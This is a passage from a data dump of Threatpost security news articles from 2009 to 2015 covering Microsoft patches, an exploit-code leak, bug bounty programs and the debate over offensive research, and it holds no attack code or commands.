made public in early November. Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all which Microsoft has deemed important, including the zero-day fixes.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002, will address the zero day, and he acknowledged they were working on a patch for the issue \u2013 which stems from a vulnerability in the kernel and allows local privilege escalation and access to the kernel \u2013 back in December.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution in Microsoft\u2019s Sharepoint Server and Microsoft Word, the third will fix an elevation of privilege in Windows 7 and Server 2008 R2 and the last bulletin will fix a denial of service (DoS) issue in Microsoft\u2019s enterprise resource planning software, Dynamics AX.\n\nPer usual Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will autoatically enable DEP.\n\n\n\nMicrosoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:30", "description": "[](<https://threatpost.com/ms12-020-rdp-code-leak-mystery-deepens-microsoft-remains-silent-031612/>)Microsoft has a big, ugly problem on its hands. The company is caught in the middle of what\u2019s rapidly become a major controversy centered on the leak of proof-of-concept [exploit code for the MS12-020 RDP vulnerability](<https://threatpost.com/ms12-020-rdp-exploit-found-researchers-say-code-may-have-leaked-security-vendor-031612/>). Many researchers, including the one who first discovered the bug and reported it to Microsoft through the Zero Day Initiative, believe that the software giant has a leak, either within its own walls in Redmond, or somewhere in its MAPP information-sharing program.\n\nThere are a number of possible explanations for the appearance of the exploit code on a Chinese download site. As odd as it may sound, the absolute best-case scenario for Microsoft is that the code was inadvertently leaked by one of the members of the MAPP (Microsoft Active Protections Program) community. If that\u2019s the case, then it simply means that one (or possibly more) of the MAPP partners was careless with the information Microsoft shared with them and the code somehow got into the wrong hands. That\u2019s not good, but it\u2019s not fatal.\n\nThe second possibility is that someone working at one of the [MAPP companies](<http://www.microsoft.com/security/msrc/collaboration/mapp.aspx>) deliberately posted the code. The MAPP program includes several dozen security and antimalware companies from around the world, and although those companies have signed NDAs and should restrict access to the MAPP info to a small group of people within their organizations, it\u2019s possible that there\u2019s a rogue employee somewhere along the line who could have done this. \n\nMoving up the scale of relative badness, a third scenario would be that someone at ZDI leaked the exploit code, either deliberately or accidentally. ZDI has been buying bugs from researchers and forwarding the data on to affected vendors for several years now, and there hasn\u2019t been any acknowledged incident linked to exploit code from the company or one of its affiliated researchers finding its way into the public domain. Once the company confirms that a bug is exploitable and has signatures ready for its customers, it then sends the data in encrypted form to the affected vendors and is pretty much out of the process from there on out. And, there\u2019s evidence that the code posted on the Chinese site was written well after ZDI sent the vulnerability information to Microsoft.\n\nAaron Portnoy of ZDI said that he is \u201c100% confident\u201d that the leak did not come from ZDI and that Microsoft has confirmed this, as well.\n\n\u201cIt was most definitely not ZDI that leaked anything,\u201d he said. \u201cWe PGP encrypt all the details and send it to the vendor and it\u2019s out of our hands at that point. We\u2019ve never had any reason to think that there\u2019s any leaks in our organization.\u201d\n\nA fourth potential scenario is that someone at the Microsoft Security Response Center somehow leaked the code. This is a fairly terrifying possibility. Consider the access that MSRC employees have. They see the incoming bug reports from researchers, work with researchers to confirm the vulnerabilities and help develop proof-of-concept exploits. If someone inside that process purposely handed over information about the RDP bug, it would be a disaster. The RDP vulnerability is a valuable one because of the huge number of affected machines and the fact that it can be exploited over the network, pre-authentication. Giving exploit code for that kind of flaw\u2013or any flaw, for that matter\u2013to outside parties would be about as bad as it gets.\n\nWhich leads to the last possibility: the MSRC is compromised. This is the doomsday scenario for Microsoft and its customers. The MSRC is a respository of a tremendous amount of valuable vulnerability data, and if that organization was somehow owned, the repercussions would be mind-boggling. It seems likely that if this was the case, there would have been other indications of the compromise at some point, possibly in the form of other exploits being leaked. And it also stands to reason that if someone had compromised the MSRC, he wouldn\u2019t advertise that fact by posting identifiable exploit code on a public site.\n\n[Luigi Auriemma](<http://aluigi.org/adv/ms12-020_leak.txt>), who discovered the RDP flaw, says that he believes that the leak came from somewhere in the MAPP chain of custody, given that the exploit code in question looks to have been written at the MSRC and that it contains a packet that he is certain is one he wrote explicitly for the purpose of testing the bug.\n\n\u201cThe executable PoC was compiled in November 2011 and contains some debugging strings like MSRC11678 which is a clear reference to the Microsoft Security Response Center. In short it seems written by Microsoft for the internal tests and was\n\nleaked probably during its distribution to their \u2018partners\u2019 (MAPP) for the creation of antivirus signatures and so on,\u201d he wrote in an analysis of the situation on his site. \u201cThe other possible scenario is about a Microsoft employee as direct or indirect source of the leak. The hacker intrusion looks the less probable scenario at the moment. The information retrieved by other people in the moment I\u2019m writing seem to confirm the MAPP hypothesis.\u201d\n\nMicrosoft [published a blog post](<http://blogs.technet.com/b/msrc/archive/2012/03/16/proof-of-concept-code-available-for-ms12-020.aspx>) late Friday afternoon on the code leak, but haven\u2019t made security officials available to answer specific questions.\n\n\u201cThe details of the proof-of-concept code appear to match the vulnerability information shared with Microsoft Active Protections Program (MAPP) partners. Microsoft is actively investigating the disclosure of these details and will take the necessary actions to protect customers and ensure that confidential information we share is protected pursuant to our contracts and program requirements,\u201d Yunsun Wee, director in the Trustworthy Computing Group, write. \n\n_Note: Kaspersky Lab is a member of the MAPP program, but Threatpost editors do not have access to the MAPP information._\n", "cvss3": {}, "published": "2012-03-16T19:12:33", "type": "threatpost", "title": "MS12-020 RDP Code Leak Mystery Deepens As Microsoft Remains Silent", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:36", "id": "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "href": "https://threatpost.com/ms12-020-rdp-code-leak-mystery-deepens-microsoft-remains-silent-031612/76339/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:36", "description": "Many industries tend to run in identifiable cycles. Financial services, the auto industry, entertainment\u2013they all have cycles. Because the security industry isn\u2019t nearly as old as any of these, it hasn\u2019t had much of a chance to establish such cycles. But one seems to be appearing now in the form of renewed criticism and distaste for offensive security research.\n\nThe most recent cycle has been building momentum for some time now, but the jumping off point may have come last month in a talk by Adobe security and privacy chief Brad Arkin. The gist of the talk was that defenders need to focus their energy on making exploitation and attacks more expensive for the bad guys. However that happens\u2013whether it\u2019s through the addition of exploit mitigation technologies, deploying sandboxes or any number of other techniques\u2013raising the cost of attacks should be the priority.\n\n\u201cI would say to the researchers here, work on defense. This is where you\u2019re going to make a difference,\u201d Arkin said. \u201cIf you come up with a new offensive technology, the bad guys will use it.\u201d\n\nThat\u2019s in contrast to the mentality that has prevailed among many software companies and security professionals, who often focus on finding and fixing as many security vulnerabilities as possible. The more bugs you fix, the fewer there are for the attackers to exploit, after all.\n\nThat\u2019s true, of course, but it ignores the fact that the number of total bugs is unknowable and constantly changing. And, it also ignores the fact that many attackers don\u2019t ever bother with zero days; there\u2019s no need. There are so many older vulnerabilities that are lying unpatched on millions and millions of machines out there that it\u2019s a waste of time and money for attackers to look for new ones to exploit. \n\u201cFinancially motivated attackers don\u2019t invest in original research. It\u2019s too expensive these days,\u201d Arkin said. \u201cIt\u2019s pen testers or it\u2019s nation states or the people funded by them. That research is done by professional bad guys who have financial horizons that far exceed those of financially motivated bad guys.\u201d\n\nAt last week\u2019s RSA Conference there were more murmurs about the relative value of offensive security research, too. The ongoing debate about the sale of bugs\u2013whether it\u2019s on the black market, the grey area of government sales or to legitimate entities such as the Zero Day Initiative\u2013includes some in the security community who are of the mind that selling vulnerabilities is an inherently shady activity. That discussion came up many times over the course of the week, with a predictable lack of agreement on the subject.\n\nThe problem, opponents of bug sales say, is that regardless of who you sell the bug to, you have no way of knowing against whom that vulnerability might ultimately be used. Some researchers say that\u2019s not their problem; they do the research and make the sale and what happens after that is up to the buyer and out of their hands.\n\nWith the [Pwn2Own contest at CanSecWest](<https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/>) scheduled for later this week, the conversation will likely not just continue, but amp up. Offense is at the fore at CanSecWest, not just during Pwn2Own, but during the conference talks, as well, and rare is the year that a major bug or exploitation technique isn\u2019t revealed there.\n\nThis is not the first time this carousel has spun round this way. Ten or fifteen years ago, as legitimate security research was making its way into the mainstream, many vendors had reactions bordering on anaphylactic shock when a researcher reported a bug to them or went public with it after a lack of response. Large software companies, including Microsoft and Oracle, would in some cases refuse to deal with researchers at all or slow the process down to such a point that it was impossible for the researchers to know whether the bug would ever be fixed.\n\nThat led to the brain-melting disclosure debate, which has never gone away, and it also led to the establishment of formal security response programs and organizations at many companies. Later, it helped spur the bug bounty programs run by companies such as Google, Mozilla and others, to reward security researchers who chose to report their findings to the vendors privately.\n\nSo, as often happens, what was old is now new again. But this time it has the added spice of cyberwar hysteria, with legions of highly trained foreign attackers using zero days stolen from some secret NSA database. Maybe that\u2019s happening. Who knows? But what\u2019s definitely happening is that researchers are selling bugs to a variety of people and organizations, some legitimate and others not. And as long as serious bugs can command six figures, that\u2019s never going to end and neither will offensive security research.\n", "cvss3": {}, "published": "2012-03-06T10:20:31", "type": "threatpost", "title": "An End to Offensive Security Research? Unlikely", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:42", "id": "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "href": "https://threatpost.com/end-offensive-security-research-unlikely-030612/76285/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:45", "description": "Microsoft made patch news on two fronts last month with an unusual [emergency patch for a critical vulnerability in Kerberos](<http://threatpost.com/microsoft-to-release-critical-out-of-band-windows-patch/109433>), and for a missing fix for an Exchange bug that was promised in its November advanced notification.\n\nIn the [December advance notification](<https://technet.microsoft.com/library/security/ms14-dec>), released today, an elevation privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high.\n\nExpect the Exchange patch to be MS14-075. The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft.\n\nThe three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up.\n\nAnother critical remote code execution bulletin is expected in Office software starting with Microsoft Word 2007 SP 3, as well as Microsoft Office 2010 SP 2, Word 2010 SP 2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as is Microsoft Word Viewer and Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important.\n\nTwo other bulletins patch remote code execution vulnerabilities in Office, but are rated important, meaning there is some mitigating circumstance, for example, an attacker would need local access or legitimate credentials exploit the flaw.\n\n\u201cWith the balance of next week\u2019s bulletins impacting Windows, December will be a month for IT to focus on the desktop,\u201d said Russ Ernst of Lumension.\n\nThe final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. Windows Server 2003 users, meanwhile, are on notice that support runs out for the platform July 14, 2015.\n\nAs the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year, and 35 the year before. IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said.\n", "cvss3": {}, "published": "2014-12-04T14:04:03", "type": "threatpost", "title": "December 2014 Microsoft Patch Tuesday Advance Notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-12-09T21:46:18", "id": "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883", "href": "https://threatpost.com/missing-exchange-patch-expected-among-december-patch-tuesday-bulletins/109722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:21", "description": "CANCUN \u2013 Bounty programs are mislabeled creatures, too often pigeonholed as a payoff for finding individual vulnerabilities in software.\n\nWrong.\n\n\u201cThe name bug bounty is actually a false categorization of what is truly just an incentive program,\u201d said Katie Moussouris, chief policy officer at HackerOne and architect of Microsoft\u2019s vulnerability coordination program, during her talk today at the Security Analyst Summit. \u201cYou are creating an incentive for whatever you want. It\u2019s not just individual bugs all the time.\u201d\n\nThat means organizations interested in nurturing their own programs should think about not only finding and fixing one-off bugs, but also focus on strategic goals such as eliminating entire classes of vulnerabilities and encouraging contributors to build mitigations. Architected correctly, vulnerability incentive programs can also feed an enterprise software development lifecycle and reduce the number of bugs that leak into production.\n\nAnd don\u2019t live under the illusion that you\u2019ll never have to contract a pen-tester again.\n\n\u201cThere\u2019s a time and place to get specialists under contact to look at things you don\u2019t want to open to the world; that\u2019s where a pen test comes in,\u201d Moussouris said. \u201cYou cannot replace pen-tests whole-heartedly. It\u2019s playing whack-a-bug if you\u2019re not feeding your bug bounty program results into your SDL.\u201d\n\nFor its part, Microsoft was standoffish about dipping into the bug bounty waters. And for good reason. As Moussouris explains it, for so long, researchers who wanted to find Windows or Internet Explorer bugs were only after credit in a Patch Tuesday security bulletin. Often, those were career boosters, she said. Even third-party established programs such as the Zero Day Initiative were contributing bugs to Microsoft gratis.\n\nBut as vulnerability brokers and companies such as VUPEN and ReVuln emerged, the market began to exert its pressures on Microsoft. Moussouris had to turn part politician inside the walls of Redmond and convince the powers that be to provide incentives to researchers to not give into the six-figure seduction of the vulnerability market and renew relationships with white-hats.\n\nThe end result were a number of specialized bounties sponsored by Microsoft, including a $100,000 mitigation bypass bounty, the Blue Hat bonus for defense and a temporary Internet Explorer bounty.\n\nIn each case, there were carrots Microsoft was dangling in front of researchers that others in the market were not.\n\n\u201cAgain, this isn\u2019t a bounty, it\u2019s an incentive,\u201d Moussouris said.\n\nYet it still wasn\u2019t good enough, Moussouris said, remembering how she had to convince Microsoft to begin paying for bug submissions in IE 10 while that version of the browser was in beta. She treasures a chart that shows a huge spike in bug submissions once IE 10 was released to manufacturing, many of those critical vulnerabilities that would be fixed in security bulletins.\n\n\u201cThere were no incentives if Microsoft fixed a bug during beta; no bulletin, no credit, no incentives during that period,\u201d Moussouris said. \u201cWhat if we create an incentive beta program if there were no buyers in town?\u201d\n\nThe bounty program was extended into beta, giving only Microsoft first crack at bugs before they were out in the open market. And they were fixed on the cheap too. For the IE 10 in beta, there were 23 submissions, 18 of those would have been rated critical, including four sandbox escapes, Moussouris said. The payout: $28,000, an average payout of $1,100.\n\n\u201cIf you create an incentive at the right time, you will absolutely get the results you want,\u201d Moussouris said.\n", "cvss3": {}, "published": "2015-02-16T13:59:58", "type": "threatpost", "title": "Lessons Learned in Building a Vulnerability Coordination Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-16T20:06:46", "id": "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "href": "https://threatpost.com/dont-build-a-bounty-program-build-an-incentive-program/111103/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:13", "description": "Microsoft today announced a relatively light load of patches will be delivered on [Patch Tuesday](<https://technet.microsoft.com/library/security/ms14-sep>) next week, along with some numbers that demonstrate public vulnerability disclosures continue to rise.\n\nFour security bulletins, one rated critical, are scheduled to be released next Tuesday. In what\u2019s becoming customary for Patch Tuesday, administrators can expect another cumulative patch roll-up for Internet Explorer addressing a number of remote code execution vulnerabilities in the browser.\n\nThe three remaining bulletins, all rated important by Microsoft, include a privilege-escalation bug in Windows 8 and 8.1 as well as Windows Server 2012 and RT. Another bulletin patches a .NET denial-of-service vulnerability in Windows Server 2003, 2008 and 2012, and on the client side OS back to Vista.\n\nAnother denial-of-service bug is expected to be patched in Microsoft\u2019s Lync instant messaging and collaboration software.\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month.\u201d\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month however,\u201d cautions Russ Ernst, director, product management, Lumension.\n\nLast month, Microsoft patched IE with a [cumulative update that addressed 26 vulnerabilities](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) including one exploited in the wild. The news out of last month\u2019s batch of bulletins, however, was a faulty patch, MS14-045, that was [re-released after users complained of crashes and blue screens of death](<http://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>). The bulletin addressed vulnerabilities in kernel-mode drivers, and Microsoft blamed font issues for the system crashes.\n\nIn the meantime, Microsoft points out in a separate announcement that public vulnerability disclosures are approaching levels matching the first half of 2012, and that more than 4,000 disclosures have been made annually since the start of 2011. That number is still well shy of the 7,000 disclosed in the 2006-2007 timeframe, Microsoft said.\n\nFor the last half of 2013, for example, disclosures across the industry were up 6.5 percent from the start of the year, and up 12.6 percent from the second half of 2012. The severity of disclosures, however, is down. A little more than six percent of bugs scored 9.9 or greater on the CVSS standard in the second half of 2013, down from almost 13 percent in the first six months of the year.\n\n\u201cVulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses,\u201d wrote Microsoft\u2019s Tim Rains in the [report](<http://blogs.technet.com/b/security/archive/2014/09/03/industry-vulnerability-disclosures-trending-up.aspx>). \u201cA high-severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower-severity vulnerability that can be exploited more easily.\u201d\n\nDisclosures of medium- and low-complexity bugs, posing the highest risk to users, far outnumber disclosures of high complexity vulnerabilities, Microsoft said.\n\nThird-party applications such as media players or Web components such as Flash or Java continue to thrive, with disclosures up 34.4 percent in the latter half of 2013 and accounted for 58 percent of disclosures during that timeframe. Operating system vulnerability disclosures, meanwhile, were down 46 percent and accounted for 15 percent of total disclosures. Browser bugs, meanwhile, were also down 28 percent and made up 10 percent of overall disclosures.\n\nMicrosoft also examined disclosures for its products, 174 in the second half of 2013, up 2 percent from the first six months. Microsoft disclosures account for 7 percent of industry disclosures, down slightly from the start of the year.\n", "cvss3": {}, "published": "2014-09-04T15:07:28", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday advance notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T19:07:28", "id": "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "href": "https://threatpost.com/patch-tuesday-includes-another-ie-update-vuln-disclosures-up/108098/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:32", "description": "On the Microsoft Secure Windows Iniative blog, software engineer Chengyun discusses the default behaviour of ActiveX controls embedded in Office documents. The software giant also provides information on how can an attacker abuse ActiveX and how Office users can change the behavior of ActiveX controls embedded in Office documents.\n\nFrom [the article](<http://blogs.technet.com/srd/archive/2009/03/03/behavior-of-activex-controls-embedded-in-office-documents.aspx>):\n\nAttackers have discovered ActiveX support in Office applications and have been using it to more effectively lure victims to web-based malware. They have recently used the \u201cMicrosoft Scriptlet Component\u201d to navigate victims to a website exploiting a patched Internet Explorer vulnerability (CVE 2009-0075, fixed by [security bulletin MS09-002](<http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx>)). Seems like attackers have discovered it is easier to trick a user to open a Word document attached to email compared to luring a user to click a dubious-looking link.\n\nChengyun also provides step-by-step instructions on configuring Office 2007 for users concerned about Safe-for-Initialization ActiveX controls being instantiated by Office without prompt.\n\nFor more on this type of attack, [check this entry](<http://blog.trendmicro.com/another-exploit-targets-ie7-bug/>) at Trend Micro\u2019s malware blog.\n", "cvss3": {}, "published": "2009-03-04T14:51:09", "type": "threatpost", "title": "Microsoft explains how ActiveX in Office is abused by attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:38", "id": "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "href": "https://threatpost.com/microsoft-explains-how-activex-office-abused-attackers-030409/72366/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:48", "description": "** \n**\n\nDatabase Management Systems (DBMS) have extended their capabilities far beyond simply serving as data storage and query systems. Contrary to what they were in the 1970\n", "cvss3": {}, "published": "2010-10-18T19:49:08", "type": "threatpost", "title": "How to Minimize Your Database Attack Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T10:19:32", "id": "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "href": "https://threatpost.com/how-to-minimize-your-database-attack-surface/74583/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:58", "description": "There\u2019s an odd bit of behavior that some Windows systems will exhibit when certain kinds of installers are launched, automatically elevating the privileges of the installer process to system-level privileges. In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:UsersusernameAppDataLocalTemp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp `(where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, in which its original name is `HXDS.dll`. This DLL is later loaded by `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said 